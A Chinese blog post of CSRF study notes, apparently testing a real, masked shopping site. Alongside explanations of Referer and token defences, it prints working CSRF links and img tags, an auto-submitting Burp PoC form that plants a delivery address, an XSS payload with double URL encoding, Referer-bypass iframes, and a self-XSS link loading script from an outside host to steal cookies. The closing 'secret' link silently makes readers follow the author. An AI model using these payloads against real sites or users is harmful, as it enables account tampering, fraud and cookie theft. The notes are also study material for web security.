zoukankan      html  css  js  c++  java
  • CSRF 跨站请求伪造学习笔记

    参考文章:

    What-是什么

    CSRF(Cross-site request forgery)跨站请求伪造。攻击者通过构造特殊链接或者页面,盗用用户身份,以合法名义完成一些非法勾当。
    大致流程:

    • 正常用户访问并登陆 A 网站

    • 于此同时,正常用户被攻击者欺骗

      • 第一种:访问恶意网站
        恶意网站中存在着恶意代码,会向 A 网站发起请求,比如说转账,发表评论,发布文章、关注用户等等一些正常的操作。由于用户已登录 A 网站存储了 A 网站的 cookie,所以浏览器会带着用户的 cookie 去完成这些操作。

      • 第二种:打开恶意链接
        在 A 网站上的一些操作是通过 GET 请求的方式完成的,比如说关注用户 www.xxx.com/like.php?target_user=xxx,攻击者通过构造该链接然后将其发送给受害用户,并带上一些迷惑性的话语,例如:免费看 VA 大片等,受害用户出于好奇心的驱使,点击了该链接,浏览器便带着用户的 cookie 去完成关注操作,而用户却浑然不知,只是在心中默骂了一句:卧槽,说好的大片呢。

    • 至此,一次 CSRF 攻击已经完成。

    Why-为什么

    怪就怪网站没有做验证,怪就怪浏览器记住了我的 cookie,怪就怪黑客说的话太诱人,怪就怪用户好奇心太重

    Where-在哪里

    • 购物类网站

      • 添加/删除 购物车、收货地址、订单
      • 关注店铺
    • 论坛类网站

      • 关注博主
      • 发表/删除 文章、评论
    • Jsonp劫持

    • 用户与服务器交互之处

    How-怎么办

    • GET 类型

      • 构造链接发送给用户
      • 构造 HTML 标签
        <img>、<audio>、<video>、<object>、<script>
    • POST 类型

      • 构造表单

    Solutions-解决的办法

    • 验证 HTTP Referer 请求头

    • 在请求地址中添加 token 并验证

    • 验证码、加密参数

    Steps-测试流程

    • 抓包,发送到 Reperater 模块

    • go一下查看正常请求的响应

    • 检查请求头中的 Referer、Oringin 头

      • 没有就过
      • 有就删除字段再发包测试一下
    • 检查参数中是否有疑似 token 的字段

      • 没有就过
      • 有就删除参数再发包测试一下
    • 当删除无法通过时,请看下面文章的 Advanced-提升 这个地方

    • 注意注意:在 POST/GET 传递的参数中,带有用户独有的 user_id 等字段时,无法造成 CSRF,除非找到能获取这个参数的 XSS/CORS 漏洞。

    Example-实例

    实例测试某购物网站:

    第一处 鸡肋个人信息修改

    个人信息

    点击保存,抓包

    发送到 Reperater 模块后,GO一下,可以看到正常请求的响应为:
    jQuery18307501563792125162_1593849507457({"isOk":true,"message":"u4feeu6539u7528u6237u4fe1u606fu6210u529f"})

    观察请求包,好家伙,一来就是个 GET 类型的,可以看到在请求参数中并没有疑似 token 字段,于是下一步,删除请求中的 Referer 头后重新发包

    可以看到响应包与之前没有删除 Referer 的响应包一样,那么基本上就可以判断存在 CSRF 漏洞了
    于是便可以构造

    1.链接,其中将 realName 字段修改为 曹植(%E6%9B%B9%E6%A4%8D) 以便于查看 CSRF 是否成功
    https://user.xxx.com/member/profile/updateUserInfo?time=0.2890179829503331&callback=jQuery18309406894391708689_1593849181119&hideNickName=hahahahaha&nickName=hahahahaha&realName=%E6%9B%B9%E6%A4%8D&province=2&city=36&district=425&birthday_y=1911&birthday_m=02&birthday_d=02&sex=1&_=1593849189035

    2.构造 HTML 标签,插入到恶意VA网站等
    <img src="https://user.xxx.com/member/profile/updateUserInfo?time=0.2890179829503331&callback=jQuery18309406894391708689_1593849181119&hideNickName=hahahahaha&nickName=hahahahaha&realName=%E6%9B%B9%E6%A4%8D&province=2&city=36&district=425&birthday_y=1911&birthday_m=02&birthday_d=02&sex=1&_=1593849189035">

    模拟受害者点击该链接或者浏览包含该 HTML 代码的恶意网页,可以看到个人用户信息中 曹植 已经篡位了,取代了 曹操

    第二处 新增收货地址(接下来的操作步骤会省略一点)


    可以看到这里 既有 token 又有 YII_CSRF_TOKEN 还有 Referer ,可惜并没有做验证操作,删除 Referer 头跟 token、YII_CSRF_TOKEN 字段即可
    在尝试完 POST 请求方式是否可以改成 GET 失败之后,考虑构造 form 表单,这里利用 BURP 的构造 POC 功能


    简单更改一下代码,弄成不需要用户点击自动提交

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://user.xxx.com/member/Address/addAddress" method="POST" type="hidden" id='test'>
          <input type="hidden" name="consignee" value="�&#155;&#185;�&#164;&#141;" />
          <input type="hidden" name="province" value="2" />
          <input type="hidden" name="city" value="36" />
          <input type="hidden" name="zone" value="425" />
          <input type="hidden" name="detail&#95;address" value="�&#150;&#176;�&#164;&#167;�&#129;&#147;" />
          <input type="hidden" name="apply&#95;mobile" value="13888888888" />
          <input type="hidden" name="apply&#95;telpone" value="" />
          <input type="hidden" name="is&#95;employees" value="" />
          <input type="hidden" name="apply&#95;email" value="" />
          <input type="hidden" name="apply&#95;zipcode" value="" />
          <input type="hidden" name="identity&#95;card" value="" />
          <input type="hidden" name="identity&#95;frontpic" value="" />
          <input type="hidden" name="idCard&#95;frontpic" value="" />
          <input type="hidden" name="identity&#95;backpic" value="" />
          <input type="hidden" name="idCard&#95;backpic" value="" />
          <input type="hidden" name="defaultAddress" value="1" />
          <input type="hidden" name="address&#95;id" value="" />
        </form>
      </body>
        <script>document.getElementById("test").submit()</script>
    </html>
    

    OK,然后把页面放到恶意网站上,诱使用户点击
    可以看到设置成了默认地址,万一有个用户没注意,直接把东西发货给我那岂不是美滋滋。嗯!牢饭真香

    第三处 添加商品到购物车

    同第一处一样,在添加商品到购物车时抓包,构造链接诱使用户点开

    1.构造链接
    http:?/bgact.xxxx.com/cart/addGoodsToCartByAjax?callback=jQuery18308528674476772126_1593854859975&goodsInfo%5B0%5D%5BproductId%5D=633433&goodsInfo%5B0%5D%5BsizeCode%5D=46&goodsInfo%5B0%5D%5BcolorCode%5D=10&number=2&productType=1&channelCode=HQ01S116&extensionId=1&cartType=&_=1593854955451
    2.构造 html 代码,插入到恶意VA网站等
    <img src="https://bgact.xxxx.com/cart/addGoodsToCartByAjax?callback=jQuery18308528674476772126_1593854859975&goodsInfo%5B0%5D%5BproductId%5D=633433&goodsInfo%5B0%5D%5BsizeCode%5D=46&goodsInfo%5B0%5D%5BcolorCode%5D=10&number=2&productType=1&channelCode=HQ01S116&extensionId=1&cartType=&_=1593854955451">
    这种应该算是挨得到灰黑产的边吧,我也不清楚,没做过

    第四处 刷赞

    同第三处一样,构造链接或者 HTML 诱使他人点击即可

    其他不想找了

    意外发现 XSS

    jsonp 处的双重 URL 编码绕过
    https://bgact.xxx.com/collection-product/addCollectionProduct?callback=%3Cimg/src/onerror=%2561lert%25281%2529%3E&goods_sn=661642&_=1593856460094
    还有好多地方有 XSS,个人信息、收货地址都有

    因为自己也是刚开始学,所以选了一个安全防护较弱的网站找的例子

    Advanced-提升

    Referer 问题

    • 未考虑 Referer 为空的情况

      • 在网页中添加<meta name="referrer" content="never">可置 Referer 为空
      • 在通过跨协议发起请求时,发送的http请求里的Referer为空,ftp://http://https://file://javascript:data:
        例如:
      <iframe src="javascript:'<script>function JSON(o){alert(o.userinfo.userid);}</script><script src=http://www.qq.com/login.php?calback=JSON></script>'">
      </iframe>
      
      <html>
          <body>
              <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
          </body>
      </html>
      
    • 判断 Referer 是否为本站某域

      • 子域上找一个 XSS 漏洞
      • 子域上找一个能插入 html 代码<a href='xxx.com'>、<img src='xxx.com'>等能发起请求的标签
      1. 判断 Referer 是否存在某关键词/某域名

      例如要求 Referer 内存在存在 xxx.com 这个关键词(一般就是要求包含主域名关键字)

      • XSS
      • 在恶意网站上新建一个xxx.com目录,然后把存有造成 CSRF 的恶意代码的 html 文件存放在 xxx.com 目录,即可绕过

      例如要求 Referer 以 xxx.com 开头

      • 恶意网站申请一个 xxx.com.eval.com 的子域名

      注意:这里的 XSS 并不是self-XSS

    Token 问题

    • 无效 token
      重复利用或者删掉就好了
    • 有效 token
      一般都是要结合 XSS 才行,利用条件苛刻,场景少。其实稍微想一下就可以知道,要得到 token,用户就必须要到提交表单的页面,而且这个表单页面也必须要有 xss 漏洞,还得是黑客可控。再者即使这些条件都满足,黑客想通过该 token 来提交表单的时候,万一后端会验证该 token,将其与对应表单提交的数据比如商品 id 什么的做校验,那么该 token 的唯一作用便是提交该商品的订单,而无法任意添加其他商品。再者,既然用户都来到了提交该表单的页面了,说明有意愿是会提交该表单的,那我们拿到 token 相当于只能帮用户自动提交表单。真好。

    CSRF + self-XSS 组合拳(用处:打其他用户 cookie,一般只会针对单个用户)

    还是之前那个网站,个人信息页面昵称处有个 self-XSS,打不到别人的 cookie,但是由于此处存在着 CSRF 漏洞,便可以结合 CSRF 与 XSS。

    构造包含 XSS 代码的 CSRF 链接即可
    https://user.xxx.com/member/profile/updateUserInfo?time=0.09009233029132824&callback=jQuery18309152739801311784_1593930781046&hideNickName=r0oki3&nickName=r0oki3%22%3E%3CsCRiPt+sRC%3D%2F%2Fxssye.com%2FTest%3E%3C%2FsCrIpT%3E%3C%22&realName=%E6%9B%B9%E6%A4%8D&province=2&city=36&district=425&birthday_y=1911&birthday_m=02&birthday_d=02&sex=1&_=1593930980030

    诱导受害人点击即可在其个人信息页面添加 XSS 代码,一旦受害人点击查看个人信息,便可获取 cookie 等信息

    XSS + CSRF (用处:批量给其他用户造成 CSRF,针对的是所有访问了包含该 XSS 代码页面的用户)

    用于刷赞、修改密码、恶意评论等等其他操作

    Surprise-意外收获

    发现一个史诗级接口,有 jsonp 劫持,而且返回的内容也是极其的阔怕滴

    没见过这么强的接口吧,密码都给你返回了,解个 md5 明文密码就出来了


    小秘密:
    博客园关注用户的地方也有 CSRF
    不信你就点开看看传送门
    然后点开我的主页,你就会发现,嘿嘿嘿





  • 相关阅读:
    Linux下VFP NEON浮点编译
    硬浮点 VFP
    程序员如何避免猝死?
    程序员谨防加班猝死之十大建议
    linux系统调用和库函数调用的区别
    彻底抛弃脚本录制,LR脚本之使用web_custom_request函数自定义
    LoadRunner监控mysql利器-SiteScope(转)
    linux mysql 数据库开启外部访问设置指南
    Java Web自定义MVC框架详解 (转)
    Jenkins+Ant+Jmeter搭建持续集成的接口测试平台(转)
  • 原文地址:https://www.cnblogs.com/wjrblogs/p/13199984.html
Copyright © 2011-2022 走看看